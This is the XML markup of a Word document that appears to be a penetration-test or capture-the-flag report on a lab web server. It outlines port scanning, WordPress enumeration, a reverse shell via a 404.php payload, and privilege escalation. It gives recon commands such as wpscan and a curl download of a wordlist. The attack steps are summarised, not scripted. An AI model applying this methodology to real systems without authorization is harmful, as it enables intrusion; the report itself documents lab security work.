          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.2 Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC0B76E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329CC31A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Conducted port scanning using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘rustscan’ and </w:t>
      </w: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nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify open ports and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603DF4FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enumerated HTTP services using tools such as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘wpscan’</w:t>
      </w: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curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’ ‘wget’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9E014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>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Reviewed web content, robots.txt, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">location, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and hidden directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B7526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.3 Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF6461B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D0A17B">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Analyzed discovered services and web pages for misconfigurations and known weaknesses  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6A2883">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Identified potential credentials, configuration files, and exposed functionality  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6A9D0">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Source code of the web reveal user name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C42AC">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Mapped possible attack paths (e.g., weak authentication, file upload, command execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE74E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE143D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.4 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E80B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2ADE55">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Leveraged identified vulnerabilities to gain initial foothold on the target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B47CAC">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Executed commands on the system where possible  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C56693">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Retrieved flags and sensitive files as proof of compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F327DF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9B5892">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.5 Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024ABF7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADF291D">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Discovered vulnerability in the web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9656D9">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Triggered the vulnerability to run a payload, 404.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65120227">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Interactive shell, the target open a shell back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E467892">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Explored the file system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00156A00">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Read challenge clue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69078B63">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Accessed users directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E86F89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Progressed to the next flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6DB81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFDC52E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDF52F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E029902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B06ACF9">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Enumerated local system configuration, SUID binaries, cron jobs, and installed applications  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6A1C0">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Identified misconfigurations or exploitable binaries for privilege escalation  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABCB36">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Gained root-level access and confirmed full system compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22110341">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB59716">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BF53AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D77F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBE479D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Below are the key vulnerabilities identified during the assessment. Each finding includes a description, evidence, impact, and remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C66A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BB332D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 Finding 1 – Example: Insecure Web Application Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3585DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E08246">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</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 xml:space="preserve">HIGH  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65FA3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F8C8A3">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5065D4C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17481A9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The main web application exposed sensitive functionality and files that could be accessed without authentication. Through directory enumeration and content analysis, it was possible to discover configuration files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and credentials that enabled further compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using wpscan. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34711711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Script: wpscan --url http://10.48.152.10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD5975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Before the above parameter, always update utilizing “ wpscan --update” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C36681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2929BD18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705DC383">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A24A254">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5456E44C">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Directory brute forcing revealed hidden paths such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/robots.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w: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/fsociety</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.dic”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E2050">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Retrieved sensitive information (e.g., wordlists, keys, or credentials) from exposed files.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A295F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154EE06F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">creenshot reference, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Figure 1 – Directory enumeration result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0753B54B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="28555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855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404562F">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="28555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5420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="269E122B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sensitive information retrieve from URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.48.152.10/robots.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF749FE">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4109D8">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wordlist found after open. using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl -0 http://10.48.152.10/fsocity.dic</w:t>
      </w:r>
    </w:p>
